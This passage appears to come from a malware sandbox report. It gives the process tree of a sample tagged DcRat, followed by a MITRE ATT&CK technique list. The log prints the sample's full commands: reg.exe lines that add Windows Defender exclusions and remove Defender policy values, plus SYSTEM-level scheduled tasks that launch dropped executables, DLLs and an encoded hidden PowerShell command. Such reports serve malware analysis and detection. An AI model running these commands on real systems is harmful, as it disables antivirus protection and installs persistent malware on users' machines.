      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2684
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1108
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2140
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        5⤵
        
        PID:892
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1576
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2516
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2792
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:392
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "glSktrXZP" /SC once /ST 02:18:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2676
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "glSktrXZP"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "glSktrXZP"
    3⤵
    - Windows security bypass
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:868
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:520
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:39:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\MRUqNER.exe\" KS /Qlsite_idZgb 385118 /S" /V1 /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2096
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
    3⤵
    PID:2280
- C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\nPHESYk.exe
  C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\nPHESYk.exe 3Y /sgsite_iduui 385118 /S
  2⤵
  - Executes dropped EXE
  PID:2352
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:23:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\THxddWb.exe\" KS /sTsite_idkgL 385118 /S" /V1 /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:1328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
    3⤵
    PID:2256
- C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\MRUqNER.exe
  C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\MRUqNER.exe KS /Qlsite_idZgb 385118 /S
  2⤵
  PID:364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\aysvJx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2792
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\HlzzjBy.xml" /RU "SYSTEM"
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:476
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "ztlTbPYifermRZH"
    3⤵
    PID:2964
- C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\MRUqNER.exe
  C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\MRUqNER.exe KS /Qlsite_idZgb 385118 /S
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:2612
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\XqFPCl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:1120
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\szbXnDC.xml" /RU "SYSTEM"
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "ztlTbPYifermRZH"
    3⤵
    PID:2260

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18339984718218269801718724570-1022824210924744689-3515996321835227964-1329608696"
1⤵
- Windows security bypass
PID:1812

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
1⤵
PID:1252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "210577778419121884031965503972-10288671431376617328-359893005-1704044988-945059856"
1⤵
PID:2908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1772564627-1879710638201412915512266990661895008906-1410912301078997959-2091408750"
1⤵
PID:2516

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
1⤵
PID:2180

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
1⤵
PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery